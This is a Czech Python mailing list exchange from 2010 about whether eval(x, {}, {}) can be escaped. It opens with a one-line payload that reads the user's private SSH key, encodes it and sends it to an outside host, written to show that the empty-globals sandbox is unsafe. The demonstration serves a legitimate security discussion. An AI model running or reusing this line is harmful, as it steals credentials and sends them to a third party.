eval("__import__('urllib2').urlopen('http://messa.cz/?pepovoklic='+__import__('base64').urlsafe_b64encode(open('/home/pepa/.ssh/id_dsa').read())).read()",
{}, {})2010/5/5 Hynek Fabian <[email protected]>: > Jan Janech (středa 05 Květen 2010 13:08:49): >> Dovolim si oponovat. Vsetko co sa da v pythone v exec spravit pre >> narusenie bezpecnosti sa da spravit aj v eval. > Jak? > > eval(x, {}, {}) > > Jakým X se dá z takové konstrukce utéci? > _______________________________________________ > Python mailing list > [email protected] > http://www.py.cz/mailman/listinfo/python > _______________________________________________ Python mailing list [email protected] http://www.py.cz/mailman/listinfo/python
